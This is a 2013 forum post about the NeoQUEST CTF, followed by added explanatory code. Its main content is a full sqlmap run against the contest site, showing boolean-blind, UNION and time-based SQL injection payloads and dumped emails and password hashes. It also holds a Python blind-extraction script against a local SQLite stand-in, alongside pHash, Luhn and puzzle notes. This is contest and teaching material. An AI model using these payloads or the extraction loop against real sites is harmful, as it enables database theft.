ANTICHAT > Security and Vulnerabilities > Ethical hacking or pentesting > Tasks/Quests/CTF/Contests

#11
10.02.2013, 03:04
aflower
Newbie
Registered: 09.02.2013
Posts: 1
Reputation: 0

NEOQUEST 2013 (neoquest.ru)

So, what we have: a dump of the DB for task 1

root@cloudbackup:~/sqlmap# python sqlmap.py -u "http://rosquest.ru/index.php?url=6"

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 07:21:29

[07:21:29] [INFO] testing connection to the target url
[07:21:29] [INFO] heuristics detected web page charset 'ascii'
[07:21:29] [INFO] testing if the url is stable, wait a few seconds
[07:21:30] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[07:21:38] [INFO] testing if GET parameter 'url' is dynamic
[07:21:38] [WARNING] GET parameter 'url' does not appear dynamic
[07:21:38] [WARNING] reflective value(s) found and filtering out
[07:21:38] [INFO] heuristic (parsing) test shows that GET parameter 'url' might be injectable (possible DBMS: 'MySQL')
[07:21:38] [INFO] testing for SQL injection on GET parameter 'url'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] Y
[07:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:21:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:21:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:21:54] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[07:21:54] [INFO] GET parameter 'url' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[07:21:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[07:21:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[07:21:55] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[07:21:56] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[07:21:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:21:57] [INFO] testing 'MySQL inline queries'
[07:21:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:21:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[07:22:07] [INFO] GET parameter 'url' is 'MySQL > 5.0.11 AND time-based blind' injectable
[07:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:22:07] [INFO] automatically exten
[INFO] target url appears to have 2 columns in query
[07:22:08] [INFO] GET parameter 'url' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'url' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: GET
Parameter: url
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: url=6 RLIKE IF(4438=4438,6,0x28)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: url=-6866 UNION ALL SELECT NULL,CONCAT(0x3a6266613a,0x43456773575656536753,0x3a6d73703a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: url=6 AND SLEEP(5)
---
[07:22:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[07:22:15] [INFO] fetched data logged to text files under 'output/rosquest.ru'
[*] shutting down at 07:22:15

[07:25:03] [INFO] testing MySQL
[07:25:03] [WARNING] reflective value(s) found and filtering out
[07:25:03] [INFO] confirming MySQL
[07:25:03] [INFO] the back-end DBMS is MySQL
[07:25:03] [INFO] fetching banner
[07:25:03] [INFO] actively fingerprinting MySQL
[07:25:04] [INFO] executing MySQL comment injection fingerprint
web application technology: Nginx, PHP 5.3.10
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and 5.0.11 AND time-based blind
    Payload: url=6 AND SLEEP(5)
---
[07:28:14] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5

[07:28:14] [INFO] fetching columns for table 'users' in database 'neoquest_web'
[07:28:15] [WARNING] reflective value(s) found and filtering out
[07:28:15] [INFO] the SQL query used returns 3 entries
[07:28:15] [INFO] retrieved: "id","int(11)"
[07:28:15] [INFO] retrieved: "email","varchar(40)"
[07:28:16] [INFO] retrieved: "role","varchar(50)"
[07:28:16] [INFO] fetching entries for table 'users' in database 'neoquest_web'
[07:28:16] [INFO] the SQL query used returns 10 entries
[07:28:16] [INFO] retrieved: "SemenPetrov@mail.ru","1","Manager"
[07:28:16] [INFO] retrieved: "PetrScheglov.2012@mail.ru","2","Admin"
[07:28:16] [INFO] retrieved: "HayoumaAzam@gmail.com","3","Admin"
[07:28:16] [INFO] retrieved: "OlgaIvanova@gmail.com","4","Accountant"
[07:28:17] [INFO] retrieved: "CourtneyKazembe.2012@gmail.com","5","Admin"
[07:28:17] [INFO] retrieved: "FlugenKohlmeier@hotmail.com","6","Admin"
[07:28:17] [INFO] retrieved: "KenShvartz@hotmail.com","7","User"
[07:28:17] [INFO] retrieved: "AnnaJokivirta@hotmail.com","8","Admin"
[07:28:17] [INFO] retrieved: "AlbertoIperti@hotmail.com","9","Admin"
[07:28:17] [INFO] retrieved: "KrisLezetc.2012@hotmail.com","10","Admin"
[07:28:17] [INFO] analyzing table dump for possible password hashes
Database: neoquest_web
Table: users
[10 entries]
+----+------------+--------------------------------+
| id | role       | email                          |
+----+------------+--------------------------------+
| 1  | Manager    | SemenPetrov@mail.ru            |
| 2  | Admin      | PetrScheglov.2012@mail.ru      |
| 3  | Admin      | HayoumaAzam@gmail.com          |
| 4  | Accountant | OlgaIvanova@gmail.com          |
| 5  | Admin      | CourtneyKazembe.2012@gmail.com |
| 6  | Admin      | FlugenKohlmeier@hotmail.com    |
| 7  | User       | KenShvartz@hotmail.com         |
| 8  | Admin      | AnnaJokivirta@hotmail.com      |
| 9  | Admin      | AlbertoIperti@hotmail.com      |
| 10 | Admin      | KrisLezetc.2012@hotmail.com    |
+----+------------+--------------------------------+

[07:28:17] [INFO] table 'neoquest_web.users' dumped to CSV file 'output/rosquest.ru/dump/neoquest_web/users.csv'
[07:28:17] [INFO] fetched data logged to text files under 'output/rosquest.ru'

I did it )))

We have the e-mails of everyone in the DB and their hashed passwords

[08:13:02] [INFO] fetching entries for table '94fhdi54g8rinnf5548581fjhgdt' in database 'neoquest_web'
[08:13:02] [INFO] the SQL query used returns 7 entries
[08:13:02] [INFO] retrieved: "CourtneyKazembe.2012@gmail.com","4f507829e3f2a72b4df9de064df76e69","1"
[08:13:02] [INFO] retrieved: "HayoumaAzam@gmail.com","ecb67dd66dd44f787c15d7d231402783","2"
[08:13:02] [INFO] retrieved: "PetrScheglov.2012@mail.ru","aefebf534eb346df845beb0d72a1fdde","3"
[08:13:02] [INFO] retrieved: "FlugenKohlmeier@hotmail.com","9de638c88a6e61d44fd29b6f48ef879b","4"
[08:13:02] [INFO] retrieved: "AnnaJokivirta@hotmail.com","50caceceaf185a26cad1ac0bb51fe6ad","5"
[08:13:03] [INFO] retrieved: "AlbertoIperti@hotmail.com","0e4a8027f7d9d9b03e01360cc43c26a9","6"
[08:13:03] [INFO] retrieved: "KrisLezetc.2012@hotmail.com","bb9030adff799137c670ca3080399542","7"
[08:13:03] [INFO] analyzing table dump for possible password hashes
[08:13:03] [INFO] recognized possible password hashes in column 'adm_pass'

Here is what we have on the MP3 player task

At the start, if you speed up the recording and play it in reverse, there is the word РАМ; then in the middle there is Morse code, which decodes to ГЕНАЕ; then at the end, if you split the recording into channels, Morse code ИНИ can be heard in the right channel. Out of this jumble some meaningful word should come, and the answer to it will be its MD5 hash sum.

And the task with the snowboarders

With the pHash: well, I drew the correct 8x8 picture and made it gray, but how do I find out the pHash? And what are those digits separated by # on the ski pass, what do they have to do with it?

Join in, let's think together)

Added 9 minutes 23 seconds later:

Presumably the credit card number will be 4701-5959-2764-8440

But first you have to log in on the airline's website

Added 1 minute 24 seconds later:

РАМ, then Morse code [--.] [.] [-.] [..] [.], and the second one in the right audio channel: [..] [-.] [..]
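As an added example (not from the post and not sqlmap's own code), here are the injection classes sqlmap reported against the `url` parameter, boolean-based blind and UNION with two columns, plus the parameterised fix, replayed in Python against an in-memory SQLite stand-in for the `index.php?url=N` query. The table layout and rows are constructed for the example; the MySQL-specific parts of the real payloads are swapped for SQLite syntax (`||` instead of `CONCAT`, `--` instead of `#`), and RLIKE/SLEEP have no SQLite equivalent, so the blind case uses a plain AND condition:

```python
# Added example (not part of the forum post): the injection classes sqlmap
# reported for the `url` GET parameter, replayed against an in-memory SQLite
# stand-in for the two-column query behind index.php?url=N.
# Assumptions: table layout and rows are constructed here; SQLite syntax
# replaces MySQL's (|| for CONCAT, -- for #); RLIKE/SLEEP do not exist in
# SQLite, so the boolean-blind probe is a plain AND condition.
import sqlite3
import string

# Characters the blind extractor tries, in order. Anything outside this set
# (a space, say) ends extraction early; real tools widen the charset as needed.
ALPHABET = string.ascii_letters + string.digits + ".@_-"

# Shaped like sqlmap's "-6866 UNION ALL SELECT NULL,CONCAT(...)#": a non-matching
# id empties the original result, NULL pads column 1, column 2 carries the data.
UNION_PAYLOAD = "-6866 UNION ALL SELECT NULL, email || ':' || role FROM users--"


def make_db():
    """Constructed sample database: one page row and one user row."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE pages(id INTEGER, title TEXT, body TEXT);
        INSERT INTO pages VALUES (6, 'Task 6', 'public text');
        CREATE TABLE users(id INTEGER, email TEXT, role TEXT);
        INSERT INTO users VALUES (2, 'PetrScheglov.2012@mail.ru', 'Admin');
        """
    )
    return con


def page_vulnerable(con, url):
    """The bug sqlmap found: the parameter is concatenated into the SQL text,
    unquoted, exactly where `url=6` lands in the WHERE clause."""
    sql = "SELECT title, body FROM pages WHERE id = " + url
    return con.execute(sql).fetchall()


def page_safe(con, url):
    """Fix: bind the value as a parameter; it is never parsed as SQL."""
    sql = "SELECT title, body FROM pages WHERE id = ?"
    return con.execute(sql, (url,)).fetchall()


def blind_extract(con, subquery, max_len=64):
    """Boolean-based blind extraction: the page only reveals whether the row
    came back, so recover `subquery`'s result one character at a time by
    asking "is character N equal to X?" until no candidate matches."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            probe = f"6 AND (SELECT substr(({subquery}), {pos}, 1)) = '{ch}'"
            if page_vulnerable(con, probe):
                recovered += ch
                break
        else:
            break  # nothing matched: end of string, or a char outside ALPHABET
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal request:     ", page_vulnerable(db, "6"))
    print("boolean true/false: ", page_vulnerable(db, "6 AND 1=1"), page_vulnerable(db, "6 AND 1=2"))
    print("UNION, 2 columns:   ", page_vulnerable(db, UNION_PAYLOAD))
    print("blind extraction:   ", blind_extract(db, "SELECT email FROM users WHERE id = 2"))
    print("parameterised query:", page_safe(db, "6 AND 1=1"))
```

The blind extractor costs one request per candidate character per position, which is why sqlmap prefers the UNION technique for dumping once it knows the column count (here, 2): one request returns a whole row instead of one yes/no answer.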
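For the snowboarder task's "I drew the 8x8 picture and made it gray, how do I get the pHash?" question, here is an added example (not from the post and not from the NeoQUEST organisers) of the two hashes that name usually refers to: the average hash of an 8x8 grey image, and the DCT-based perceptual hash (32x32 grey image, top-left 8x8 block of low-frequency coefficients, bit set where a coefficient exceeds their median, as in the pHash library and Python `imagehash`). That the task wants exactly this variant is an assumption, and the 32x32 sample image is constructed here, not the task's picture:

```python
# Added example (not part of the forum post): aHash and DCT-based pHash in
# pure Python. Assumptions: the task uses one of these standard definitions;
# sample_image() is a constructed test picture, not the task's image.
import math
import statistics


def dct_1d(vec):
    """Orthonormal DCT-II of one row or column (O(n^2), fine for n = 32)."""
    n = len(vec)
    out = []
    for u in range(n):
        s = sum(vec[x] * math.cos(math.pi * (2 * x + 1) * u / (2 * n)) for x in range(n))
        out.append(s * (math.sqrt(1.0 / n) if u == 0 else math.sqrt(2.0 / n)))
    return out


def dct_2d(img):
    """Separable 2-D DCT: rows first, then columns. Result indexed [v][u]."""
    h, w = len(img), len(img[0])
    rows = [dct_1d(r) for r in img]
    cols = [dct_1d([rows[y][u] for y in range(h)]) for u in range(w)]
    return [[cols[u][v] for u in range(w)] for v in range(h)]


def bits_to_hex(bits):
    """Row-major bit list -> hex string, most significant bit first."""
    value = 0
    for b in bits:
        value = (value << 1) | int(b)
    return format(value, "0{}x".format((len(bits) + 3) // 4))


def average_hash(gray):
    """aHash: one bit per pixel, set where the pixel is above the mean (8x8 input)."""
    flat = [p for row in gray for p in row]
    mean = sum(flat) / len(flat)
    return bits_to_hex([p > mean for p in flat])


def phash(gray, hash_size=8):
    """pHash: DCT the grey image (e.g. 32x32), keep the top-left hash_size^2
    low-frequency coefficients, set a bit where one exceeds their median."""
    coeffs = dct_2d(gray)
    low = [coeffs[v][u] for v in range(hash_size) for u in range(hash_size)]
    med = statistics.median(low)
    return bits_to_hex([c > med for c in low])


def hamming(hex_a, hex_b):
    """Number of differing bits between two hashes (distance <= ~10 means 'similar')."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def sample_image(n=32):
    """Constructed 32x32 grey image: smooth waves plus an off-centre bright disc."""
    img = []
    for y in range(n):
        row = []
        for x in range(n):
            v = (110 + 40 * math.sin(2 * math.pi * x / n + 0.7)
                 + 25 * math.cos(2 * math.pi * y / n + 1.9)
                 + 15 * math.sin(2 * math.pi * (x + 2 * y) / n))
            if (x - 20) ** 2 + (y - 11) ** 2 < 36:
                v += 40
            row.append(int(round(v)))
        img.append(row)
    return img


def adjust_brightness(gray, delta):
    """Constant brightness shift: only the DC coefficient moves, so pHash is stable."""
    return [[max(0, min(255, p + delta)) for p in row] for row in gray]


def invert(gray):
    """Negative image: every AC coefficient flips sign, so almost every bit flips."""
    return [[255 - p for p in row] for row in gray]


# Constructed 8x8 image for aHash: bright top half, dark bottom half.
FLAT_8X8 = [[200] * 8] * 4 + [[50] * 8] * 4

if __name__ == "__main__":
    base = sample_image()
    print("aHash of 8x8 sample:", average_hash(FLAT_8X8))
    print("pHash:              ", phash(base))
    print("brighter, distance: ", hamming(phash(base), phash(adjust_brightness(base, 10))))
    print("inverted, distance: ", hamming(phash(base), phash(invert(base))))
```

If the task's 8x8 drawing is already the grey thumbnail, `average_hash` is the one to try first; `phash` expects the larger (conventionally 32x32) grey image and reduces it through the DCT itself.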
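Added example, not from the post: a Luhn check on the card number guessed above, with the check digit that would make a 15-digit prefix valid. It assumes the task wants a real-looking 16-digit PAN; a CTF number need not satisfy Luhn, so treat the result as a sanity check on the transcription rather than a verdict on the guess. As posted, 4701-5959-2764-8440 does not pass (the weighted digit sum is 73), while 4701-5959-2764-8447 would:

```python
# Added example (not part of the forum post): Luhn validation and check-digit
# computation. Assumption: the task's number is a standard 16-digit PAN.
def luhn_digits(number):
    """Keep only the digits of a number written with dashes or spaces."""
    return [int(c) for c in number if c.isdigit()]


def luhn_ok(number):
    """True if the digits pass the Luhn (mod 10) check: from the right, double
    every second digit, subtract 9 from any result above 9, sum must be 0 mod 10."""
    digits = luhn_digits(number)
    if len(digits) < 2:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def luhn_check_digit(prefix):
    """The single digit that makes prefix + digit pass luhn_ok."""
    for d in range(10):
        if luhn_ok(prefix + str(d)):
            return str(d)
    raise AssertionError("unreachable: exactly one digit always works")


if __name__ == "__main__":
    guess = "4701-5959-2764-8440"
    print(guess, "passes Luhn:", luhn_ok(guess))
    print("check digit for 470159592764844:", luhn_check_digit("470159592764844"))
```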
 
ANTICHAT ™ © 2001- Antichat Kft.